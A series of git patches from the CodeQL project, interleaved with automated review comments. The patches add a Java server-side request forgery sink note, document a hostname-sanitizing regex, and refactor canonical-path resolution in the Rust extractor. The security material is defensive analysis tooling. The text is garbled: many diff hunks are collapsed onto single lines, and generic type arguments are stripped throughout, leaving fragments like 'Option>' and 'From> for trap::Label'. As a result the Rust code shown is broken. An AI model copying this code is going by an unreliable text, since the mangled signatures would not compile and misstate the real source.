7f8a1ae941703e6e01717f5777eb6b072df852a7 Mon Sep 17 00:00:00 2001 
From: Owen Mansel-Chan
Date: Thu, 28 Nov 2024 17:03:41 +0000
Subject: [PATCH 0764/1267] Add change note
---
...4-11-28-model-resttemplate-getforobject-third-parameter.md | 4 ++++
1 file changed, 4 insertions(+)
create mode 100644 java/ql/lib/change-notes/2024-11-28-model-resttemplate-getforobject-third-parameter.md
diff --git a/java/ql/lib/change-notes/2024-11-28-model-resttemplate-getforobject-third-parameter.md b/java/ql/lib/change-notes/2024-11-28-model-resttemplate-getforobject-third-parameter.md
new file mode 100644
index 00000000000..4f45d19e5e8
--- /dev/null
+++ b/java/ql/lib/change-notes/2024-11-28-model-resttemplate-getforobject-third-parameter.md
@@ -0,0 +1,4 @@
+---
+category: minorAnalysis
+---
+* Added a sink for "Server-side request forgery" (`java/ssrf`) for the third parameter to org.springframework.web.client.RestTemplate.getForObject, when we cannot statically determine that it does not affect the host in the URL.
From 2c061b0d560dd8a0fd18e6cbabacf500428ab761 Mon Sep 17 00:00:00 2001
From: Owen Mansel-Chan
Date: Fri, 29 Nov 2024 09:46:08 +0000
Subject: [PATCH 0765/1267] Add QLDoc for HostnameSanitizingPrefix
---
.../lib/semmle/code/java/security/RequestForgery.qll | 11 +++++++----
1 file changed, 7 insertions(+), 4 deletions(-)
diff --git a/java/ql/lib/semmle/code/java/security/RequestForgery.qll b/java/ql/lib/semmle/code/java/security/RequestForgery.qll
index c670d92b5ea..1f3ce61406f 100644
--- a/java/ql/lib/semmle/code/java/security/RequestForgery.qll
+++ b/java/ql/lib/semmle/code/java/security/RequestForgery.qll
@@ -63,14 +63,17 @@ abstract class RequestForgerySanitizer extends DataFlow::Node { } private class PrimitiveSanitizer extends RequestForgerySanitizer instanceof SimpleTypeSanitizer { } +/** + * A string constant that contains a prefix which looks like when it is prepended to untrusted + * input, it will restrict the host or entity addressed. + * + * For example, anything containing `?` or `#`, or a slash that doesn't appear to be a protocol + * specifier (e.g. `http://` is not sanitizing), or specifically the string "/". + */ class HostnameSanitizingPrefix extends InterestingPrefix { int offset; HostnameSanitizingPrefix() { - // Matches strings that look like when prepended to untrusted input, they will restrict - // the host or entity addressed: for example, anything containing `?` or `#`, or a slash that - // doesn't appear to be a protocol specifier (e.g. `http://` is not sanitizing), or specifically - // the string "/". exists(this.getStringValue().regexpFind("([?#]|[^?#:/\\\\][/\\\\])|^/$", 0, offset)) } From 9cf2420c3b4d63601d8c5c74fa99ecd353895b9f Mon Sep 17 00:00:00 2001 
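Review bot: The first sentence of the new QLDoc ("contains a prefix which looks like when it is prepended to untrusted input, it will restrict ...") is hard to parse for a class that is now public. Suggested wording: `A string constant containing a prefix that, when prepended to untrusted input, appears to restrict the host or entity addressed.` Since the explanation has moved away from the `regexpFind` call, a short pointer there, `// see the class QLDoc for what this pattern accepts`, would keep the regular expression readable on its own.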
From: Paolo Tranquilli Date: Fri, 29 Nov 2024 14:42:25 +0100 Subject: [PATCH 0766/1267] Rust: restrict canonical path calculations --- rust/extractor/src/generated/.generated.list | 2 +- rust/extractor/src/generated/top.rs | 171 +++++++++++------- rust/extractor/src/translate/base.rs | 35 ++-- rust/extractor/src/translate/mappings.rs | 34 ++++ rust/ql/.generated.list | 63 ++++--- rust/ql/.gitattributes | 15 +- rust/ql/lib/codeql/rust/elements/Path.qll | 2 +- .../lib/codeql/rust/elements/PathExprBase.qll | 1 + rust/ql/lib/codeql/rust/elements/PathPat.qll | 1 + .../lib/codeql/rust/elements/RecordExpr.qll | 1 + .../ql/lib/codeql/rust/elements/RecordPat.qll | 1 + .../lib/codeql/rust/elements/Resolvable.qll | 2 +- .../codeql/rust/elements/TupleStructPat.qll | 1 + .../elements/internal/CallExprBaseImpl.qll | 3 +- .../rust/elements/internal/ResolvableImpl.qll | 2 +- .../elements/internal/TupleStructPatImpl.qll | 6 +- .../internal/generated/ParentChild.qll | 83 +++++---- .../rust/elements/internal/generated/Path.qll | 4 +- .../internal/generated/PathExprBase.qll | 3 +- .../elements/internal/generated/PathPat.qll | 3 +- .../rust/elements/internal/generated/Raw.qll | 56 +++--- .../internal/generated/RecordExpr.qll | 3 +- .../elements/internal/generated/RecordPat.qll | 3 +- .../internal/generated/Resolvable.qll | 2 +- .../elements/internal/generated/Synth.qll | 29 ++- .../internal/generated/TupleStructPat.qll | 3 +- rust/ql/lib/rust.dbscheme | 39 ++-- .../canonical_path/canonical_paths.expected | 41 +---- .../extractor-tests/canonical_path/regular.rs | 8 + .../FormatTemplateVariableAccess.expected | 10 +- .../FormatTemplateVariableAccess.ql | 12 +- ...ableAccess_getResolvedCrateOrigin.expected | 0 ...teVariableAccess_getResolvedCrateOrigin.ql | 7 + ...ateVariableAccess_getResolvedPath.expected | 0 ...tTemplateVariableAccess_getResolvedPath.ql | 7 + .../generated/Path/Path.expected | 52 +++--- .../extractor-tests/generated/Path/Path.ql | 12 +- 
.../generated/Path/PathExpr.expected | 12 +- .../generated/Path/PathExpr.ql | 13 +- .../PathExpr_getResolvedCrateOrigin.expected | 0 .../Path/PathExpr_getResolvedCrateOrigin.ql | 7 + .../Path/PathExpr_getResolvedPath.expected | 0 .../Path/PathExpr_getResolvedPath.ql | 7 + .../generated/Path/PathPat.expected | 2 +- .../extractor-tests/generated/Path/PathPat.ql | 11 +- .../PathPat_getResolvedCrateOrigin.expected | 0 ...n.ql => PathPat_getResolvedCrateOrigin.ql} | 2 +- .../Path/PathPat_getResolvedPath.expected | 0 ...lvedPath.ql => PathPat_getResolvedPath.ql} | 2 +- .../Path/Path_getResolvedCrateOrigin.expected | 2 - .../Path/Path_getResolvedPath.expected | 2 - .../generated/RecordExpr/RecordExpr.expected | 8 +- .../generated/RecordExpr/RecordExpr.ql | 13 +- ...RecordExpr_getResolvedCrateOrigin.expected | 0 .../RecordExpr_getResolvedCrateOrigin.ql | 7 + .../RecordExpr_getResolvedPath.expected | 0 .../RecordExpr/RecordExpr_getResolvedPath.ql | 7 + .../generated/RecordPat/RecordPat.expected | 4 +- .../generated/RecordPat/RecordPat.ql | 13 +- .../RecordPat_getResolvedCrateOrigin.expected | 0 .../RecordPat_getResolvedCrateOrigin.ql | 7 + .../RecordPat_getResolvedPath.expected | 0 .../RecordPat/RecordPat_getResolvedPath.ql | 7 + .../TupleStructPat/TupleStructPat.expected | 6 +- .../TupleStructPat/TupleStructPat.ql | 13 +- .../TupleStructPat_getField.expected | 14 +- .../TupleStructPat_getPath.expected | 6 +- ...eStructPat_getResolvedCrateOrigin.expected | 0 .../TupleStructPat_getResolvedCrateOrigin.ql | 7 + .../TupleStructPat_getResolvedPath.expected | 0 .../TupleStructPat_getResolvedPath.ql | 7 + rust/schema/annotations.py | 12 +- rust/schema/prelude.py | 2 +- 73 files changed, 583 insertions(+), 327 deletions(-) create mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.expected create mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql 
create mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql create mode 100644 rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.expected create mode 100644 rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql create mode 100644 rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql create mode 100644 rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.expected rename rust/ql/test/extractor-tests/generated/Path/{Path_getResolvedCrateOrigin.ql => PathPat_getResolvedCrateOrigin.ql} (91%) create mode 100644 rust/ql/test/extractor-tests/generated/Path/PathPat_getResolvedPath.expected rename rust/ql/test/extractor-tests/generated/Path/{Path_getResolvedPath.ql => PathPat_getResolvedPath.ql} (91%) delete mode 100644 rust/ql/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.expected delete mode 100644 rust/ql/test/extractor-tests/generated/Path/Path_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.expected create mode 100644 rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql create mode 100644 rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql create mode 100644 rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.expected create mode 100644 rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql create mode 100644 
rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql create mode 100644 rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.expected create mode 100644 rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql create mode 100644 rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.expected create mode 100644 rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql diff --git a/rust/extractor/src/generated/.generated.list b/rust/extractor/src/generated/.generated.list index ec1f2815442..8ca2c6931b1 100644 --- a/rust/extractor/src/generated/.generated.list +++ b/rust/extractor/src/generated/.generated.list @@ -1,2 +1,2 @@ mod.rs 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 4bcb9def847469aae9d8649461546b7c21ec97cf6e63d3cf394e339915ce65d7 -top.rs 272ecf2f56f35211d2449dbf55b1907d8414a8e4cceded03fd12f6f599852c73 272ecf2f56f35211d2449dbf55b1907d8414a8e4cceded03fd12f6f599852c73 +top.rs 8db75515b09f6c96beb8c2895e7495350e76557d01399de5faf6c314a45ce594 8db75515b09f6c96beb8c2895e7495350e76557d01399de5faf6c314a45ce594 diff --git a/rust/extractor/src/generated/top.rs b/rust/extractor/src/generated/top.rs index 73048514fda..8cdec4c9b9f 100644 --- a/rust/extractor/src/generated/top.rs +++ b/rust/extractor/src/generated/top.rs 
@@ -1671,6 +1671,60 @@ impl From> for trap::Label { } } +#[derive(Debug)] +pub struct Path { + pub id: trap::TrapId, + pub qualifier: Option>, + pub part: Option>, +} + +impl trap::TrapEntry for Path { + fn extract_id(&mut self) -> trap::TrapId { + std::mem::replace(&mut self.id, trap::TrapId::Star) + } + + fn emit(self, id: trap::Label, out: &mut trap::Writer) { + out.add_tuple("paths", vec![id.into()]); + if let Some(v) = self.qualifier { + out.add_tuple("path_qualifiers", vec![id.into(), v.into()]); + } + if let Some(v) = self.part { + out.add_tuple("path_parts", vec![id.into(), v.into()]); + } + } +} + +impl trap::TrapClass for Path { + fn class_name() -> &'static str { "Path" } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme Path is a subclass of AstNode + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme Path is a subclass of Element + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme Path is a subclass of Locatable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct PathSegment { pub id: trap::TrapId, 
@@ -6001,69 +6055,6 @@ impl From> for trap::Label { } } -#[derive(Debug)] -pub struct Path { - pub id: trap::TrapId, - pub qualifier: Option>, - pub part: Option>, -} - -impl trap::TrapEntry for Path { - fn extract_id(&mut self) -> trap::TrapId { - std::mem::replace(&mut self.id, trap::TrapId::Star) - } - - fn emit(self, id: trap::Label, out: &mut trap::Writer) { - out.add_tuple("paths", vec![id.into()]); - if let Some(v) = self.qualifier { - out.add_tuple("path_qualifiers", vec![id.into(), v.into()]); - } - if let Some(v) = self.part { - out.add_tuple("path_parts", vec![id.into(), v.into()]); - } - } -} - -impl trap::TrapClass for Path { - fn class_name() -> &'static str { "Path" } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme Path is a subclass of AstNode - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme Path is a subclass of Element - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme Path is a subclass of Locatable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - -impl From> for trap::Label { - fn from(value: trap::Label) -> Self { - // SAFETY: this is safe because in the dbscheme Path is a subclass of Resolvable - unsafe { - Self::from_untyped(value.as_untyped()) - } - } -} - #[derive(Debug)] pub struct PathExprBase { _unused: () @@ -6109,6 +6100,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathExprBase is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct PathPat { pub id: trap::TrapId, 
@@ -6168,6 +6168,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct PathType { pub id: trap::TrapId, @@ -6562,6 +6571,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordExpr is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct RecordFieldList { pub id: trap::TrapId, @@ -6684,6 +6702,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme RecordPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct RefExpr { pub id: trap::TrapId, @@ -7511,6 +7538,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme TupleStructPat is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct TupleType { pub id: trap::TrapId, @@ -9444,6 +9480,15 @@ impl From> for trap::Label { } } +impl From> for trap::Label { + fn from(value: trap::Label) -> Self { + // SAFETY: this is safe because in the dbscheme PathExpr is a subclass of Resolvable + unsafe { + Self::from_untyped(value.as_untyped()) + } + } +} + #[derive(Debug)] pub struct Static { pub id: trap::TrapId, diff --git a/rust/extractor/src/translate/base.rs b/rust/extractor/src/translate/base.rs index 003c86919b6..65b64a8b0b7 100644 --- a/rust/extractor/src/translate/base.rs +++ b/rust/extractor/src/translate/base.rs 
@@ -1,4 +1,4 @@ -use super::mappings::{AddressableAst, AddressableHir}; +use super::mappings::{AddressableAst, AddressableHir, PathAst}; use crate::generated::MacroCall; use crate::generated::{self}; use crate::rust_analyzer::FileSemanticInformation; @@ -53,8 +53,20 @@ macro_rules! emit_detached { $self.extract_canonical_origin_of_enum_variant(&$node, $label); }; // TODO canonical origin of other items - (Path, $self:ident, $node:ident, $label:ident) => { - $self.extract_canonical_destination(&$node, $label); + (PathExpr, $self:ident, $node:ident, $label:ident) => { + $self.extract_path_canonical_destination(&$node, $label.into()); + }; + (RecordExpr, $self:ident, $node:ident, $label:ident) => { + $self.extract_path_canonical_destination(&$node, $label.into()); + }; + (PathPat, $self:ident, $node:ident, $label:ident) => { + $self.extract_path_canonical_destination(&$node, $label.into()); + }; + (RecordPat, $self:ident, $node:ident, $label:ident) => { + $self.extract_path_canonical_destination(&$node, $label.into()); + }; + (TupleStructPat, $self:ident, $node:ident, $label:ident) => { + $self.extract_path_canonical_destination(&$node, $label.into()); }; (MethodCallExpr, $self:ident, $node:ident, $label:ident) => { $self.extract_method_canonical_destination(&$node, $label); 
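Review bot: The five new `emit_detached!` arms in `base.rs` (`PathExpr`, `RecordExpr`, `PathPat`, `RecordPat`, `TupleStructPat`) have identical bodies, and nothing says which other lists they have to match. They depend on the `PathAst` impls in `mappings.rs` and on the generated `Resolvable` label conversions that `$label.into()` uses. A node kind that is made `Resolvable` later but gets no arm here would presumably fall through to a default arm outside this hunk and carry no resolved path, with no error. A comment above the first arm would make this explicit: `// Keep in sync with the PathAst impls in mappings.rs and the Resolvable subclasses in the schema.` The macro definition starts and ends outside the hunk.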
@@ -506,25 +518,22 @@ impl<'a> Translator<'a> { })(); } - pub(crate) fn extract_canonical_destination( + pub(crate) fn extract_path_canonical_destination( &mut self, - item: &ast::Path, - label: Label, + item: &impl PathAst, + label: Label, ) { (|| { + let path = item.path()?; let sema = self.semantics.as_ref()?; - let resolution = sema.resolve_path(item)?; + let resolution = sema.resolve_path(&path)?; let PathResolution::Def(def) = resolution else { return None; }; let origin = self.origin_from_module_def(def)?; let path = self.canonical_path_from_module_def(def)?; - generated::Resolvable::emit_resolved_crate_origin( - label.into(), - origin, - &mut self.trap.writer, - ); - generated::Resolvable::emit_resolved_path(label.into(), path, &mut self.trap.writer); + generated::Resolvable::emit_resolved_crate_origin(label, origin, &mut self.trap.writer); + generated::Resolvable::emit_resolved_path(label, path, &mut self.trap.writer); Some(()) })(); } diff --git a/rust/extractor/src/translate/mappings.rs b/rust/extractor/src/translate/mappings.rs index 885055a6017..6ad8a7d1df6 100644 --- a/rust/extractor/src/translate/mappings.rs +++ b/rust/extractor/src/translate/mappings.rs @@ -170,3 +170,37 @@ impl AddressableAst for ast::Union { impl AddressableAst for ast::Module { type Hir = Module; } + +pub trait PathAst: AstNode { + fn path(&self) -> Option; +} + +impl PathAst for ast::PathExpr { + fn path(&self) -> Option { + self.path() + } +} + +impl PathAst for ast::RecordExpr { + fn path(&self) -> Option { + self.path() + } +} + +impl PathAst for ast::PathPat { + fn path(&self) -> Option { + self.path() + } +} + +impl PathAst for ast::RecordPat { + fn path(&self) -> Option { + self.path() + } +} + +impl PathAst for ast::TupleStructPat { + fn path(&self) -> Option { + self.path() + } +} diff --git a/rust/ql/.generated.list b/rust/ql/.generated.list index b0c71e3ef01..dff9541b449 100644 --- a/rust/ql/.generated.list +++ b/rust/ql/.generated.list 
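Review bot: In `extract_path_canonical_destination`, `path` is bound twice with different meanings: first the syntax node from `item.path()?`, then the canonical path from `canonical_path_from_module_def(def)?`. Renaming the first binding keeps them apart: `let ast_path = item.path()?;` followed by `let resolution = sema.resolve_path(&ast_path)?;`. The closure also returns without emitting anything when the node has no path, when semantics are unavailable, or when the resolution is not `PathResolution::Def`, and a missing crate origin suppresses the canonical path as well. A doc comment would tell query authors why some nodes have no resolved path: `/// Emits nothing unless the path resolves to a definition with both a crate origin and a canonical path.` The generic arguments of `label: Label` are not visible on this page.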
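Review bot: In `mappings.rs`, every `PathAst` impl body is `self.path()` inside a method that is itself named `path`. It avoids calling itself only because method resolution prefers the accessor already defined on the `ast` type; an impl for a type without that accessor would recurse unconditionally. Those accessors are defined outside this hunk, so this is inferred rather than visible here. A comment on the trait would record the dependency: `// Each impl forwards to the ast node's own path() accessor, which takes priority over this trait method.` The trait also has no doc comment; `/// AST nodes that carry a path which extract_path_canonical_destination can resolve to a definition.` would cover it.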
@@ -101,29 +101,29 @@ lib/codeql/rust/elements/ParenExpr.qll b635f0e5d300cd9cf3651cfcefd58316c21727295 lib/codeql/rust/elements/ParenPat.qll 40d033de6c85ad042223e0da80479adebab35494396ab652da85d3497e435c5a 8f2febe5d5cefcb076d201ae9607d403b9cfe8169d2f4b71d13868e0af43dc25 lib/codeql/rust/elements/ParenType.qll e1f5695b143c97b98ccdb460a5cf872461cfc13b83a4f005f26c288dc0afae10 1164f8efae7f255925411bddb33939fab0bf1c07955a16fef173b3f4675d09ae lib/codeql/rust/elements/Pat.qll 56211c5cb4709e7c12a2bfd2da5e413a451672d99e23a8386c08ad0b999fd45c b1b1893a13a75c4f0390f7e2a14ee98a46f067cfdc991a8d43adc82497d20aff -lib/codeql/rust/elements/Path.qll 94869df09b929c4a60bae42b7e3a66c007f41078c08b7d9c6defb705b953ce8e eb317f75b89978d41fd3b166c7e3d871da4c04b3e17afbbcd0a5d73881e0d1d9 +lib/codeql/rust/elements/Path.qll 16264a9c978a3027f623530e386a9ad16541305b252fed5e1bedcfbe1d6475d5 8c21063c7f344ce686342e7c12542fec05004e364681f7a31b65f5ee9263a46d lib/codeql/rust/elements/PathExpr.qll 906df1d80c662b79f1b0b0428c39754b7f8dbcb2234919dd45dd8206a099dd36 1d6015afab6378c926c5838c9a5772cfcfeedf474e2eeca3e46085300ff8d4e1 -lib/codeql/rust/elements/PathExprBase.qll bb41092ec690ae926e3233c215dcaf1fd8e161b8a6955151949f492e02dba13a b2257072f8062d31c29c63ee1311b07e0d2eb37075f582cfc76bb542ef773198 -lib/codeql/rust/elements/PathPat.qll 6897e69bcb24b56d39ede796cf5767988dcd5741e02333fa8495dd7c814f771a 2a011fb92f17e4b4ff713e6d29f591054dfede22a9aaa006e67fca2c23ab76bf +lib/codeql/rust/elements/PathExprBase.qll db8702a2e2cec7c1daaad38649c27b657759103ca451dfa9d34b9be873fdc0af d770e983fb55e06f3fcee6b7511cf5d4ed4c4f6a18d8b1d1f14553cdbe8666df +lib/codeql/rust/elements/PathPat.qll 9d0b29b964bfe3a90af4c9930868a3d2046d2210a1575f9b9af84f6fd3fccbab 21748a5bd01d5531c846e6b7c1cc9fddf4adc0c959843e668df200a2490a5f94 lib/codeql/rust/elements/PathSegment.qll 9560551cf8b65e84705e7f302e12b48330e048613129e87c0f65a7eb297a6cc3 3aa75a5fd81f8ea32bd2b4bf0c51c386de57cbe9ab035fe3ec68ad7fcf51b375 lib/codeql/rust/elements/PathType.qll 
257ede178bb74ebdb8e266ebaa95082e7fb7cc8d921ef476f4df268ee8a1366c c48f6e04a8945a11f965e71819f68c00abc53a055042882b61716feda3ca63ae lib/codeql/rust/elements/PrefixExpr.qll 107e7bd111b637fd6d76026062d54c2780760b965f172ef119c50dd0714a377d 46954a9404e561c51682395729daac3bda5442113f29839d043e9605d63f7f6d lib/codeql/rust/elements/PtrType.qll b137f47a53e41b3b30c7d80dbdd6724bf15f99530ca40cc264a04af5f07aa878 b2ffdf739bfb7564d942fe54409834a59511c0b305b6d5b2219a8ee0ef594332 lib/codeql/rust/elements/RangeExpr.qll 43785bea08a6a537010db1138e68ae92eed7e481744188dfb3bad119425ff740 5e81cfbdf4617372a73d662a248a0b380c1f40988a5daefb7f00057cae10d3d4 lib/codeql/rust/elements/RangePat.qll b5c0cfc84b8a767d58593fa7102dcf4be3ff8b02ba2f5360c384fa8af4aac830 cc28399dd99630bfa50c54e641a3833abe6643137d010a0a25749d1d70e8c911 -lib/codeql/rust/elements/RecordExpr.qll eb402960c5c6a14d0a0ffebd61a352b59b5d1cc1c2531cacd54754310a812d77 415c93384e63cf38003dde987715554ebf45fc32ba03bc5fd78b8d2501812de1 +lib/codeql/rust/elements/RecordExpr.qll d368aaf18319c0560c04d0438caf64b3b7aad3aa0cf4bbb643bfbb58d6d71091 44323e15b5a6fab187e846abe9cb530c6472ed673993c5e3679279b1286792da lib/codeql/rust/elements/RecordExprField.qll edac04146849e2aeca27e7bbb896c21aa2e2b15736b1e8a06ac51ab01433b3ac 7c062bd6d5dd5b1d972450fb0b3272cd9b45f94ccd668c3bd4347e2dce3279ed lib/codeql/rust/elements/RecordExprFieldList.qll 672c3854cb84090c8a2e9311c43448016dc2614ecbf86dbe404156304674e38f 01ae0ffca0bf640c61120e36fcf2c560555f4aabbd49ddce6f5c1a3561dbfc31 lib/codeql/rust/elements/RecordField.qll 9c462033cc889756876cb3d2a07e4f0d9a67064cf188cdd68e08ab21e5edc459 437254bbf6537f1a575ae344c2e23ffad7138776db8f7ebf90026c13886a2638 lib/codeql/rust/elements/RecordFieldList.qll cebab3fba41221e61cda801070a7f414b62b4fbcf2206e35462c0da35ad75c3f db092d47eea871d61541b9711d7139a99394e0ed83901a8ae60f03dfa8ed722f -lib/codeql/rust/elements/RecordPat.qll a210d700e710107100fedad1098fb789056a0c0b8dbc11de2b242877e692ec20 
3efa12d7bfa0da7c09a42b2b43c50ff3985c55676db7f3be2c771765d81f9a10 +lib/codeql/rust/elements/RecordPat.qll bb21f25373afd03232f8e2977134b6a10ac525f0bd654bbf95713b964b99ba0f 28313e566c86d09ae3b60df538a3c7561f73c02b8ac93eaa5ff9914b2c9b241c lib/codeql/rust/elements/RecordPatField.qll 7487461887e82bcf224b02628dfc64457121ab17e731e2dc7aa7e731ab16c02f f2018e55722245eb4273fb067242aaa503c43f91671a55b3a4bb51fe7bc0a03c lib/codeql/rust/elements/RecordPatFieldList.qll c3198c997f389ce95db377ca40ac69a1448f120093f37ab1c92a5a3f1f6aa0d4 9db36d274f1ec77c442ae7e38f940a65c9a92f1541f66140188b226965851535 lib/codeql/rust/elements/RefExpr.qll 91a0d3a86002289dc01ffbe8daca13e34e92e522fbb508241a9d51faf1d4a9d2 b6e63d8e6f8956d2501706d129a6f5f24b410ea6539839757c76ba950c410582 lib/codeql/rust/elements/RefPat.qll fe076bdccb454111b38f360837d180274ba8a003b4cffe910b5197cd74188089 2604c8bb2b0b47091d5fc4aa276de46fe3561e346bd98f291c3783cef402ba06 lib/codeql/rust/elements/RefType.qll 5dc6012188d5baf36cd7bf0ebc127e28e98862a3f91ea4df2f9b9c962f3a395d ddb06ebe7fb92ad7bbe86cf182270e8494b74edf91b8c841aaf7ba932e5092ac lib/codeql/rust/elements/Rename.qll 55fa06145f2160304caac0a5ce4cf6a496e41adfd66f44b3c0a1d23229ed8ce0 80262f0abf61749cdf0d5701637db359960f5404ad1dbfdd90f5048d2e7c315d -lib/codeql/rust/elements/Resolvable.qll 213c0c157541002ddd61cc76cdc11386819aa59dff0a81780474cccb6b7fb211 cdcf807587f887493888341a1b6f9bed202b80b37cacc77041a256b05ff4d3d1 +lib/codeql/rust/elements/Resolvable.qll 550d516d55b2c10e6e2afd0b9df7434448405ac8a84c4ded8b56fa1173612d32 0b59f31f411a14dd4eb0fe9df5483e4a00501a480bde6db9e6a499b9c0a57184 lib/codeql/rust/elements/RestPat.qll a898a2c396f974a52424efbc8168174416ac6ed30f90d57c81646d2c08455794 db635ead3fa236e45bbd9955c714ff0abb1e57e1ce80d99dc5bb13438475adbf lib/codeql/rust/elements/RetType.qll 36ea39240a56c504d94d5487ea9679563eef3dfe0e23bf42d992d1ab2b883518 2fe5b6f62a634c6aa30a1ecd620f3446c167669cf1285c8ef8dd5e5a6ef5fc71 lib/codeql/rust/elements/ReturnExpr.qll 
b87187cff55bc33c8c18558c9b88617179183d1341b322c1cab35ba07167bbdb 892f3a9df2187e745c869e67f33c228ee42754bc9e4f8f4c1718472eb8f8c80f @@ -145,7 +145,7 @@ lib/codeql/rust/elements/TupleExpr.qll 561486554f0c397bc37c87894c56507771174bfb2 lib/codeql/rust/elements/TupleField.qll e58d024fc41519b559eef36cf6081d03a786b05357e4322e7046092131ea508f cad861b23fb4cdf2fbe90595de0e4776f1db9b69c3f3825221e475bc92895351 lib/codeql/rust/elements/TupleFieldList.qll 73397eef1cf8c18286b8f5bb12fbdc9bb75eee3b7bd64d149892952b79e498a3 13ac90f466ab22e5750af9e44aff9605b9e16f8350b4eaecff6a99e83d154e25 lib/codeql/rust/elements/TuplePat.qll 028cdea43868b0fdd2fc4c31ff25b6bbb40813e8aaccf72186051a280db7632e 38c56187971671e6a9dd0c6ccccb2ee4470aa82852110c6b89884496eb4abc64 -lib/codeql/rust/elements/TupleStructPat.qll 16a3f10992db62cc6630dc962a2a0d243c41b8aca064d6cb6c82a2f4e6987a12 c2b4c14567ee2dd65e0b643c9d18dfe5098fb3bd4ed45dcc825065bfa7c7c02d +lib/codeql/rust/elements/TupleStructPat.qll 743022ff471131aa58cd8ff131eef1568400da0ddefa5dbab1609a7ce00797d7 c6ddf777c3ee3a0f4d55c42f3af6a01e190a1e8892237c6e85c9ae65c84e39f3 lib/codeql/rust/elements/TupleType.qll b5c798f7c9b08c8a6cc0a57fc5c36d714e70d5e955a9e87b6b309c18365d7596 ebea533ab126392344d080da1bc9efabcabb5397e93c9d213ffc71a61bb8d47c lib/codeql/rust/elements/TypeAlias.qll 64780697f5869266345d040fdaee05c62b8670b9b5c6369692f9a9dc646986fc afcc7617d0e2e16d92d2a53c3e6661fd184bf5cf21b154f121dbf4d3b7ab30e6 lib/codeql/rust/elements/TypeArg.qll 39aea9a9f0b74e8b90e957dbc3ce593cbdb1d2e0d9320428ce2e9cbfcb772e53 f1f2612633de9f534faf76c368b6154a8dc20feb9297262fcb10a8f192aa2e02 
